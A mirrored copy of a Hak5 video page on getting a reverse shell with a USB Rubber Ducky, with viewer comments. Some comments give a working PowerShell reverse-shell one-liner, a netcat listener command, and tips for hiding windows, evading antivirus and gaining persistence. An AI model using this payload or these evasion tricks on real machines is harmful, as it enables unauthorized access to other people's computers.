Тёмный

How to Get a Reverse Shell in 3 Seconds with the USB Rubber Ducky - Hak5 2110 

Hak5
Подписаться 928 тыс.
Просмотров 356 тыс.
50% 1

Hak5 -- Cyber Security Education, Inspiration, News & Community since 2005:
____________________________________________
In this episode of Hak5, we're creating a reverse shell with the USB Rubber Ducky that exploits a target computer in less than 3 seconds!
Find complete show notes and USB Rubber Ducky payload details at www.hak5.org/episodes/hak5-21...
USB Rubber Ducky at the HakShop by Hak5: hakshop.myshopify.com/products...
-------------------------------
Shop: www.hakshop.com
Support: / threatwire
Subscribe: / hak5
Our Site: www.hak5.org
Contact Us: / hak5
------------------------------
~-~~-~~~-~~-~
Please watch: "Bash Bunny Primer - Hak5 2225"
• Bash Bunny Primer - Ha...
~-~~-~~~-~~-~
____________________________________________
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community - where all hackers belong.

Наука

Опубликовано:

 

7 июл 2024

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 318   
@Cevans3535
@Cevans3535 7 лет назад
Just a tip for anyone that may run into this issue like I have: When you write Ducky code to run CMD (or whatever you choose to open with the RUN command) and simulate the 'ALT + Y' key combination to select the 'Yes' button on the UAC dialog prompt, it's a good idea to follow up on the next line with a 'BACKSPACE' keystroke in the chance you're deploying onto a user's machine that has his/her UAC turned off. Otherwise, if you don't account for UAC being disabled, your first line of code typed into the CMD window will be prefixed with a 'y' character leading off (which of course throws an error and renders the whole payload useless). Pressing backspace as the first key press on a machine that does have UAC enabled will effectively do nothing at all since there's nothing to delete. It's a win-win and you don't have to deal with the irony of your attack being thwarted by someone who has disabled a feature meant to make them safer. It's like leaving your front door open only to have a thief knock himself out cold by walking into the knife edge of the opened door. Haha >.
@mitchb77
@mitchb77 7 лет назад
Chris Evans you legend i have been getting "y mode is not a recognised command" thanks for the info
@Cevans3535
@Cevans3535 7 лет назад
Mitch Maguny Awesome! Glad it helped. Just a note: Pressing CTRL + C is actually quicker and easier than pressing Left Arrow + Delete. But either one works ;)
@mitchb77
@mitchb77 7 лет назад
Chris Evans So the next line literally reads CTRL + C ?
@Cevans3535
@Cevans3535 7 лет назад
Mitch Maguny It would literally read CTRL C (if you're talking about the ducky code format). Here's an example screenshot of what that section of code would look like: i.gyazo.com/a295f2c5e4c46ae1c57767e95e516c4f.png
@mitchb77
@mitchb77 7 лет назад
Ok thanks for that i have only managed to get 2 scripts working so far.I have issues with the twin duck saving files to my drive.
@slipdipvirtualboxgaming8030
@slipdipvirtualboxgaming8030 5 лет назад
1 sticker = +0.3 CPU cores
@m4gg197
@m4gg197 5 лет назад
So this guy has ca. 9999999 CPUs? 😂🤘🏼
@skselim8536
@skselim8536 3 года назад
Lol😂
@kubakaktus_
@kubakaktus_ 2 года назад
Dont' buy stickers :D Just download more RAM LOL. Or RGB 1 led +2 gpu and + 999999999 fps
@Daffyclient
@Daffyclient 2 года назад
@@kubakaktus_ big brain time
@Rheaded
@Rheaded Год назад
Skickar stickers
@lordgarth1
@lordgarth1 7 лет назад
I can't help being distracted by the button presses to change cameras.
@CassianoCalegari
@CassianoCalegari 7 лет назад
You made me realize it, can't stop paying attention to it now.
@shixxx8
@shixxx8 7 лет назад
Lol mee to, I was noticing this 😁
@thecalabiyaumanifold
@thecalabiyaumanifold 7 лет назад
but if he's shooting all this live with no post production editing.. mad props.
@bakralkarawi9977
@bakralkarawi9977 7 лет назад
Same XD
@fantasaicproductions7612
@fantasaicproductions7612 6 лет назад
Its so cool right!??!!
@0dayCTF
@0dayCTF 4 года назад
Always run your listener with( nc -lvnp 8080 ), so you know you got the incoming connection. It enables verbose mode.
@lovetodaylivetommorow2861
@lovetodaylivetommorow2861 7 лет назад
"These hacker stickers make it go faster" -Darren Loooooool
@uniquelycommon2244
@uniquelycommon2244 7 лет назад
Very good stuff. And the Powershell-script-download-based tactic you show here is a lot more useful, from a practical standpoint, than the Mr. Robot-featured Rubber Ducky attack that you made a vid on a few weeks ago. This doesn't require the logged-in user having admin privileges, and it gets you a shell (from which you can try to do anything you like, including trying to find a way to eventually elevate your privileges to admin and then dump credential hashes). A suggestion: it would be really neat to see a vid where you use a Powershell script along with Empire, Metasploit, or another tool to install a *persisting* backdoor that gets restarted each time a user logs in and periodically reaches back to your server on a schedule of your liking to create a reverse shell or get instructions. .
@Stixes
@Stixes 7 лет назад
Got the single stage payload down to a 256 char run command. \o/
@anythingandeverything264
@anythingandeverything264 5 лет назад
Cool! Please share!
@tomwimmenhove4652
@tomwimmenhove4652 4 года назад
I didn't know about the php -S thing. Neat!
@superfatunicorn4758
@superfatunicorn4758 7 лет назад
when doing this the powershell window stays open, and when closed it closes the session. Is this normal, and if so, can we change the script of the powershell to change this?
@lebouski
@lebouski 7 лет назад
you guys rock....thanks for the tetra , turtle and ducky....helped change my life !
@Sifar_Secure
@Sifar_Secure 7 лет назад
Shannon Morse is the best example of nominative determinism I have seen in quite a while!
@RetemVictor
@RetemVictor 7 лет назад
Denver is at 5280 and that airport is a circus of madness did you catch the crazy apocalypse mural in the concors...
@hak5
@hak5 7 лет назад
YES! In fact, I'm going to post some videos of it on my personal youtube page soon... That place was SO WEIRD. - Shannon (ru-vid.com)
@RiDankulous
@RiDankulous 7 лет назад
I'm glad to have found this channel since it is very good topics, good presentation and interesting to watch. Thanks sooo much! Reverse shells can be better because a program calling out usually has an easier time getting through a firewall than a program trying to call into a computer. That little php server command is *gold*. Thanks sooo much!
@jonit7255
@jonit7255 7 лет назад
@gain, thank you for all this information. yall always present the info in ways I can keep attention... thank U
@mohammedaslampasha743
@mohammedaslampasha743 2 года назад
I love the energy, you guys ae so fun to watch, cool guys doing cool stuff
@JoshuaPritt
@JoshuaPritt 7 лет назад
OMG thanks to your shirt I just realized that the toor in toorcon is root spelled backwards. I'm ashamed I didn't figure that out sooner. it might also help to actually go or look more into it.
@projectcity8964
@projectcity8964 7 лет назад
You two ROCK. I love every one of your videos. Keep it up.
@hak5
@hak5 7 лет назад
Thank you!
@danmustache7599
@danmustache7599 7 лет назад
You are welcome. Any time I can help out.
@ChunkyChest
@ChunkyChest 7 лет назад
ty .. using a Win32 API call to AttachConsole() + a WScript.Shell object ( see MSDN for docs on both ) with the Write method would allow you to exec a command stream more reliably and covertly ( unless that's what you're doing already ). If not, the problem you can run into is needing to keep the console focused. The upside is Powershell can instantiate shell objects and make Win32 API calls ;).
@LeoTakacs
@LeoTakacs 7 лет назад
Command Prompt has actually been around since Windows 2000 because Windows 2000 was the first version of Windows to be based on the NT kernel and not the win9x kernel. All win9x version's of Windows were essentially running on top of MS-DOS, and 2000 and newer were NOT based upon MS-DOS, that's why cmd.exe exists in those OS's.
@Jan.-
@Jan.- 7 лет назад
How to change the keyboard layout from Arduino Mini (Pro Micro) to QWERTZ ? have problems with german (QWERTZ) keyboard layouts :c
@NodePoint
@NodePoint 7 лет назад
If you want to go mobile with Netcat, on Android you can use the netcat binary that comes with Busybox (if it's installed, that is).
@ceticx
@ceticx 4 года назад
is there a place to download the 20 second, first script they used at 5:00. i cant find it on their website/the rest of the internet
@over00lordunknown12
@over00lordunknown12 5 лет назад
*So I have a question:* If you don't have access to admin CMD, you can just use regular and write it to the user or temp directory, right? Okay, then, the firewall might block it, but if it is just communicating on the LAN, then the network is set to "Trusted" by default, right? So no privileges needed?
@DanielPradoBurgos
@DanielPradoBurgos 7 лет назад
Awesome channel!!! Keep it up! And btw.... Y U NO USE VIM??? :P
@GhostsPlace
@GhostsPlace 6 лет назад
You could create a new virtual desktop or workspace (I'm not sure how it's called in windows) to hide a window
@xetronchan1059
@xetronchan1059 6 лет назад
If we use the faster way, it needs to download something from a website (in this video Darren's PHP server), which is a concern that already stated at the very beginning of the video isn't it? So if I understand correctly this means we can't get both advantage of high-injection-speed and high-success-chance right? Its a trade-off like, either 1)I sacrifice chance of success by having fast injection through downloading PS script, or 2) do this without downloading the PS script to have a higher chance, but with slower-injection.
@joaofilipedelgado
@joaofilipedelgado 7 лет назад
Hi Daren if you want a pretty shell just do the same for the meterpreter shell and it's more or less the same time
@judgesh
@judgesh 7 лет назад
The only thing I see wrong with this is the problem with it not running as administrator. You'd need to have that same ~3 second delay to run powershell StartProcess powershell -verb RunAs then continue with downloading the PS script.
@dominikkisiel6945
@dominikkisiel6945 Год назад
Does the usb duck have to be permanently in the usb socket of the second computer during the connection or is it enough to insert it for a while while the script is loaded?
@PeterPan-fl1lp
@PeterPan-fl1lp 4 года назад
Ok I’m using nc on. My macOS Catalina terminal using the command nc -l -p 8080 . I get the error no: missing port with option -l. Any ideas on what could be going wrong?
@shino2366
@shino2366 4 года назад
u can completely hide the CMD prompt from showing up by opening up a separate window using crtl+win+d and once the CMD is executed, u can bo back to the window and delete it... and since going back and deleting will only take like milliseconds... it won't be mostly noticible...
@THEWATERBORNMAN
@THEWATERBORNMAN 7 лет назад
keep up the good work
@goopey7-intros43
@goopey7-intros43 7 лет назад
Anyone know where to get Darren's T-Shirt?
@thesleepingtsi6782
@thesleepingtsi6782 5 лет назад
Haha I always rep and tag you guys on social media for thousands and thousands to see 😊 I would scream in excitement if I ever won anything from you guys 😂
@someyounggamer
@someyounggamer 6 лет назад
That shirt is a must!
@baiqing
@baiqing 7 лет назад
Just use the back doors factory, social engineering tools and host the reverse she'll payload. It would be a Meterpreter shell that bypasses Antivirus.
@everythingdigital1
@everythingdigital1 7 лет назад
This is like the same thing I posted on there forum but way better lol mine just used the standard Net Cat executable in a zip file in a drop box extracted then ran with cmd via vbs to make it run invisibly. Any way nice job I didn't think this could have been done faster I honestly never thought about a powershell version netcat.
@davidlee50
@davidlee50 Год назад
I kinda wish HaK5 would sell the bare minimum Tablet/Portable PC, but make it plug n play style. Branch Out and Expand HaK5!
@thechaker
@thechaker 6 лет назад
Excellent !
@nullbyte8753
@nullbyte8753 4 года назад
⁦❤️⁩😁 المشكله تاخذ وقت طويل 😁 احسن شي احسن من روبر دوكي الهندسه العكسيه باستخدام جافا و الفايربيز 😊 قريباً اكملها انشالله 😁 . ال روبردوكي يخوف المستخدم اغلب المستخدمين يخافون من نافذة الامليتور. صراحه صار 4 سنوات اتابع قناة هاك5 و هي من افضل مصادري على الانترنت و بعد قناة hak5 project 313 و بعد قناتين حلوات 😁⁦❤️⁩ am very thankful 🙏 to know you guys 😁❤️ from iraq
@badpixelproductions8437
@badpixelproductions8437 7 лет назад
would using msfvenom to make a payload, and then emailing it to the victim via a fake email account, and then using the msfconsole to use an exploit to the activate the payload be practical?
@DavidBusby
@DavidBusby 7 лет назад
`sudo python -m SimpleHTTPServer 80` serves the current directory (`pwd` so you'll need to `cd` first), alternative to the php command as most distros are likely to already have python installed
@muhammadsyihanzhafiri4245
@muhammadsyihanzhafiri4245 5 лет назад
"python -m SimpleHTTPServer "
@redslashed
@redslashed 2 года назад
I love your channel so much😍😍
@cursedmale7490
@cursedmale7490 3 года назад
How about just enabling remote desktop, new admin user and slowing in firewall. Done and no code for defender to hit on.
@NateCrownwell
@NateCrownwell 7 лет назад
best blooper ever :)
@chrislavers7726
@chrislavers7726 7 лет назад
Heya, I rly want to do this to prank my friend but I am scared I am going to damage my friends laptop. Is there a way where I can remove the reverse shell on his pc, if so can I do it remotely ?
@etf_da12bt91
@etf_da12bt91 Год назад
So once the command is run and terminal is open on windows system how do you make that either nt view able or make the power shell close?
@BicospaceTech
@BicospaceTech 2 года назад
you guys so dope !!
@KenDogNI
@KenDogNI 7 лет назад
SMA sockets on a tin box is good, gives the RF signal a better ground plane..
@valentinnavarro2965
@valentinnavarro2965 5 лет назад
I need to compile a duckyscript txt file that I wrote originally for my USB Rubber Ducky. But now I need to find a way to run the script as an exe file locally. ¿How can I make this posible? ¿How can I compile the script to an exe file?
@kevinrenn6611
@kevinrenn6611 4 года назад
Iv'e searched the comments for anything pertaining towards my question but can't seem to find anything! So it seems that this method relies on two conditions being true 1. The user or victim must be logged in 2. The domain this victim is connected to isn't enforcing some sort of group policy (GPO is very common amongst any competent tech team) My question is how can one install netcat on the victim machine if the target does not have any sort of admin privileges for that particular user due to GPO.
@WeirdWolf
@WeirdWolf 7 лет назад
Does somebody know how to utilize the Ducky on an Android phone? None of the payloads i found work for me, neither do any shortcuts for physical keyboards connected to Android. If anybody has a working payload for Android (any kind really), would you mind pointing me to it? Or did Android remove some HID funtionality in any newer version?
@sharpfang
@sharpfang 5 лет назад
First, attach the ducky through a USB OTG adapter or you achieve nothing connecting USB slave to USB slave. Then, Android doesn't provide neat keyboard shortcuts. You may have your ducky emulate a keyboard and a mouse, and use the mouse to click things... except every phone will have things elsewhere as people install different things and the icons are in random places. Your best bet is to emulate a USB to serial converter, hope the phone has debug options enabled (or try enabling them through mouse clicks) and use ADB shell that will then appear over USB-as-RS232
@fsnd7954
@fsnd7954 3 года назад
can i make my flash drive to be usb rubber ducky ? if yes can u give me a link to a paper or information like that
@Latrocinium086
@Latrocinium086 Год назад
Man miss these episodes
@TopGamingStudio
@TopGamingStudio 7 лет назад
Also how can i get access to hidden directories.
@xugestory
@xugestory 5 лет назад
Will this give us consistent access to the computer ? Or just once?
@RchardSleeth
@RchardSleeth 2 года назад
Thoughts : jpeg with embedded nano script utilizing the single stage reverse power shell script?
@pingpong1138
@pingpong1138 7 лет назад
The powershell window never goes away which really gives it away, even if you hide it in the corner. This seems really good if all you want to do is use it to put a more stable reverse shell on it or grab one quick file.
@googlemail369
@googlemail369 2 года назад
There is a powershell command to execute files but with the -hiddenWindow arg it will launch whout a window.
@richoffremo461
@richoffremo461 Год назад
@@googlemail369 you gotta telegram or discord? Id like to ask a couple questions bout this if you don’t mind.
@dnfrd2
@dnfrd2 Год назад
@@googlemail369 thanks to window header libs, was able to implement same in a cpp payload
@aakashjana6225
@aakashjana6225 5 лет назад
Will use rubber ducky work if used is blocked on the computer??
@salacryl
@salacryl Год назад
Question: How does this work if powershell is in Contrained Language mode?
@lewis1902
@lewis1902 5 лет назад
...and what might you do if Run is disabled?
@GrantWill
@GrantWill 7 лет назад
Do like elie bursztein and have the usb get a reverse tcp meterpreter connection and you will have a prettier shell with clearer commands! Look up mal usb! But otherwise awesome stuff! 👍🤓
@baiqing
@baiqing 7 лет назад
You could use the social engineering toolkit "SET" and setup a reverse https meterpreter shell.
@Aralmo640
@Aralmo640 3 года назад
Nice! I did something similar with an arduino nano iot with a led screen to "hack" wifi passwords easily. I would connect it to usb and use it as a keyboard to get the current connected wifi, list the password with key clear and send it back through COM to be shown in the LCD. Just for the fun of seeing your friends face when you ask to connect to the wifi and instead of asking for the key you ask to connect that stuff full of dupont cables in a test board to the USB to get it XDDDDDD
@karlbergen6826
@karlbergen6826 4 года назад
I've seen a number of videos on reverse shell. Could they be used to fix a computer with a software problem since you can see everything one it? Could they be used to modify a computer such as to install a working new operating system?
@skuldug1250
@skuldug1250 4 года назад
Of course not. The reverse shell is running as long as the box is connected to the internet and is constantly running the backdoor. It's not possible to install a new OS as you have to 1) go into bootloader 2) get onto the new OS and then install the OS into bootloader and drive partition. This process will involve rebooting, OS switching, to the point where you cannot use an internet-based reverse shell to do it, and the program will have to installed anew on the *nix OS or whatever OS you would like even if you tried to actually pull it off. That means you'd probably have to flash a new script for the *nix system. Long story short, it isn't going to work.
@karlbergen6826
@karlbergen6826 4 года назад
@@skuldug1250 Your comment is interesting. Question: Could the reverse shell order an attack computer to shutdown or do a changeroot?
@skuldug1250
@skuldug1250 4 года назад
@@karlbergen6826 shutdown should work. chroot is a *nix operation, it's not (afaik) natively possible on windows but I also don't see the benefits of it -- what would be your goal?
@djAmored
@djAmored 7 лет назад
What laptop are you using for linux?
@bruhminator8459
@bruhminator8459 5 лет назад
when you want to buy a sticker for 2:50 but it costs 40$ shipping
@Darkl0ud_Productions
@Darkl0ud_Productions 7 лет назад
is shannon using a mini laptop? what is it
@rasprosecutor
@rasprosecutor 7 лет назад
First computerphile puts out a video about malware, then you guys? Now you're making me want to get back into the hacking game...
@williamcornell3599
@williamcornell3599 7 лет назад
if stickers make it faster, then I need a lot of them
@Hello-ih4rn
@Hello-ih4rn 7 лет назад
Couldn't you just create the executeable from typing the text you would get if you would of opened it in notepad?
@madscientist057
@madscientist057 5 лет назад
Aren't these power shell scripts mitigated by a good group policy that prevents users from running power shell let alone that downloadstring command
@phreaklulz
@phreaklulz 7 лет назад
I love the USB Ducky, But the only problem I have is the driver load time on a lot of machines, being a simple HID device, I didnt think it would have to search windows update for a driver and download it, please if their is a bypas to make the install faster let me know!
@sharpfang
@sharpfang 5 лет назад
If you make this a generic keyboard, the driver should already be there.
@sebasq109
@sebasq109 6 лет назад
¿Why is the JAVA -jar XXXX command for?
@nagarathnagopal6898
@nagarathnagopal6898 3 года назад
Can u make a video on hiding payloads in image files for reverse shell
@jasonperry6046
@jasonperry6046 7 лет назад
Disk OS...... What happened to dirty operating system
@userou-ig1ze
@userou-ig1ze 4 года назад
wouldn't it be faster to write to notepad and convert the filename to .bat?
@andropchax3846
@andropchax3846 7 лет назад
FASTER AND MORE INTENSE!!! xD
@JonMichaelDeBona
@JonMichaelDeBona 5 лет назад
That's what she said.
@sundz5899
@sundz5899 7 лет назад
what laptops do they use?
@spiceyswag7519
@spiceyswag7519 4 года назад
does it still works when the cmd is closed? Because the victim might notice and just exit immidiately If so then it's Completely Useless.
@umang0055
@umang0055 3 года назад
Hey does anyone still have the script as its removed from their page. By the way it was really interesting and juicy knowledge
@INeedAttentionEXE
@INeedAttentionEXE 7 лет назад
Can you "hotswap" between a hid to mass storage and put a file into the disk then switch over to a hid then run said file?
@spoozy666
@spoozy666 3 года назад
There is an alternative to the Rubber Ducky firmware called Twin Duck, it makes it able to have both HID and mass storage
@TheChinobi23
@TheChinobi23 Год назад
Bash bunny can do both
@darrencope123
@darrencope123 7 лет назад
hak5 will you be selling any more field kits I can't find on your website xD
@a.a1940
@a.a1940 2 года назад
Can I use an autorun usb with power shell scripts
@thedosiusdreamtwister1546
@thedosiusdreamtwister1546 7 лет назад
I managed to get the script down to 258 characters. Everything was going smoothly until I remembered "Oh yeah, you have to invoke powershell in there as well." Back up to 269 we go. Failsauce. Anyway, here's the shortened script: nal f New-Object;$s=(f Net.Sockets.TCPClient(4294967295,8)).GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne0){;$d=(f Text.UTF8Encoding).GetString($b,0,$i);$t=([text.encoding]::UTF8).GetBytes((iex $d 2>&1));$s.Write($t,0,$t.Length)} converted variable names from 2 characters to 1 (10 characters) deleted unnecessary white spaces (2 characters) converted ip address to a 64 bit integer and removed the quotes( (o1*2^24)+(o2*2^16)+(o3*2^8)+(o4) ) (7 characters) moved to port 8 (3 characters) switched to utf-8 encoding (2 characters) created alias f for new-object (1 character) BTW: The character cap on the windows run box is actually only 259 characters.
@cwbh10
@cwbh10 7 лет назад
i made this 0.5 seconds
@KeyChainer
@KeyChainer 7 лет назад
Kryštof Píštěk it really depends on target computer. I don't know about 0.5 seconds, but lowering the initial delay is possible.
@sleazymcyeazy7892
@sleazymcyeazy7892 7 лет назад
0.1
@atanki5682
@atanki5682 5 лет назад
0.0 hehehehehe jk
@userou-ig1ze
@userou-ig1ze 4 года назад
how?
@ananta2178
@ananta2178 4 года назад
Hahaha
@rmp5s
@rmp5s 7 лет назад
What is that thing Shannon is on?
@m.whitmore1974
@m.whitmore1974 6 лет назад
Ok, where did he get the shirt? I got to get one.
@User-kq3od
@User-kq3od 3 года назад
Love this stuff I definitely plan to get myself one of your Duckys, especially with the fair price tag. Now all I need is to decide on the Payloads, done a lot of testing with RATs but unless I put multiple AV disable which would make the payload very obvious and complex, I would need an undetected payload.
@IIIIII-ke3lo
@IIIIII-ke3lo 2 года назад
U just snitched on yourself good job
@User-kq3od
@User-kq3od 2 года назад
@@IIIIII-ke3lo Wdym?
@User-kq3od
@User-kq3od 2 года назад
@@IIIIII-ke3lo gonna explain?
@Brenna_stubbs
@Brenna_stubbs 6 лет назад
I'm going to do this on my zip disk
@achrafiabiten9668
@achrafiabiten9668 6 лет назад
Nice i really like you guys from morroco , and i would lik if you present any leasson as hackers in moroco for cyber security presentation 😍😍
@AKATEATime
@AKATEATime 7 лет назад
Good stuff! That tree command output looks a lot like those tech support scams..... You're the one! ..Except you're missing the accent... Heh
@faisel685
@faisel685 7 лет назад
wifi pineapple 2017 lol happy new year
@goopey7-intros43
@goopey7-intros43 7 лет назад
Did this faster than the speed of light
@xxrobloxprogamerxx180
@xxrobloxprogamerxx180 3 года назад
No the light speed isn't a time measure stuped imagine being a remote access trojan
@rushprather665
@rushprather665 2 года назад
He's my friend and a whole lot more! Ha! Denver... Awesome
@mertkocer2507
@mertkocer2507 2 года назад
could someone help with the r.ps1 part i cant host it
@kornbread5359
@kornbread5359 4 года назад
Do ports exist physically or are they just software mechanisms?
@skuldug1250
@skuldug1250 4 года назад
Well, sure, you have USB ports and such. But mainly ports are pretty much "addresses"/communication endpoints which apps can listen on (which means that when packets arrive dedicated to a specific port they get easily forwarded to the application listening on the port). So 80 is the standard port for internet traffic, and a packet traveling over the internet would have xxx.xxx.xxx.xx:80 as the destination. In fact, if you were to use an encrypted reverse shell, setting it to port 80 is a great idea because that port is always open, and the encrypted binaries just look like random passing by data. Very sneaky...
@Fractal227
@Fractal227 7 лет назад
Faster and more intense. Put some rubber on it(^.-) (-.^) (^.^) On another note, how would you connect to the reverse shell? What would you define as your end point. Sending it directly to your own equipment at your house isint very sneeky, so if we think "bad hackers" here. Would you than use a "barrowed" credit card to connect to some encrypted GSM equipment paid with that card and forward the connection to yourself or what ideas comes to mind?
@TopGamingStudio
@TopGamingStudio 7 лет назад
should i get a Rasbery pi 3 for kali linux?
@brockbain8656
@brockbain8656 7 лет назад
TopGamingStudio any Pi will work, then again so will a USB jammed in a laptop with persistence
@o0julek0o
@o0julek0o 7 лет назад
that's what she said
@TopGamingStudio
@TopGamingStudio 7 лет назад
yes but i will be testing websites vulnerabilities and im just wondering will it be fast enough? to do anything
@gonespral
@gonespral 7 лет назад
a persistence usb with Kali installed might be a better idea
@brockbain8656
@brockbain8656 7 лет назад
MrX Would still beat most of the rPi models...
@padulas2000
@padulas2000 2 года назад
Congratulations !!! Made In Brazil - :-)
Далее
Do NOT Plug This USB In! - Hak5 Rubber Ducky
11:37
Advanced NMap Techniques - Hak5 2415
40:46
Просмотров 167 тыс.
Send this to an artist… 😉 #shortsart
00:19
Просмотров 3,4 млн
catch EVERY reverse shell while hacking! (VILLAIN)
19:03
I made a (super cool) Wireless BadUSB
7:15
Просмотров 135 тыс.
hack like Mr. Robot
3:55
Просмотров 446 тыс.
Introducing the NEW 🐤 USB Rubber Ducky
7:59
Просмотров 226 тыс.